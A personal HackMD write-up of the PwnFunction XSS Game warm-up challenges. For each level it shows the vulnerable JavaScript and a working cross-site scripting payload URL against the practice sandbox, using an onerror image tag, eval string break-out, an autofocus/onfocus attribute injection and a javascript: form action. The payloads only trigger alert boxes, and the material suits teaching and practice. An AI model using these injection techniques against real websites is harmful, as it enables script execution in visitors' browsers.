XSS Game - HackMD

# XSS Game ## Description this will be a list challenges I do on this [link](https://xss.pwnfunction.com/) # Warm up ## Ma Spaghet! **Source of injection:** end of link: /?<badstuff> **code:** ```javascript=  <h2 id="spaghet"></h2> <script> spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!" </script> ``` bascially looks at URL and will grab somebody parameter which is where we can inject `https://sandbox.pwnfunction.com/warmups/ma-spaghet.html/?somebody=<img src=0 onerror=alert(1337)>` ## Jeff **code:** ```javascript=  <h2 id="maname"></h2> <script> let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF") let ma = "" eval(`ma = "Ma name ${jeff}"`) setTimeout(_ => { maname.innerText = ma }, 1000) </script> ``` we can use the eval ${} to execute the alert with param jeff `"https://sandbox.pwnfunction.com/warmups/jefff.html/?jeff="-alert(1337)-"` ## Ugandan Knuckles **code:** ```javascript=  <div id="uganda"></div> <script> let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?"); wey = wey.replace(/[<>]/g, '') uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">` </script> ``` can use param wey but it is a little more tricky as we cannot use `/[<>]/g` as they get replaced we can still maniuplate <input ...> where wey is place with onfocus `https://sandbox.pwnfunction.com/warmups/da-wey.html/?wey="onfocus=alert(1337) autofocus="` ## Ricardo Milos **code:** ```javascript=  <form id="ricardo" method="GET"> <input name="milos" type="text" class="form-control" placeholder="True" value="True"> </form> <script> ricardo.action = (new URL(location).searchParams.get('ricardo') || '#') setTimeout(_ => { ricardo.submit() }, 2000) </script> ``` it gets ricardo param to set a user controlled input through a GET parameter ricardo the form is auto submitted `https://sandbox.pwnfunction.com/warmups/ricardo.html/?ricardo=javascript:alert(1337)`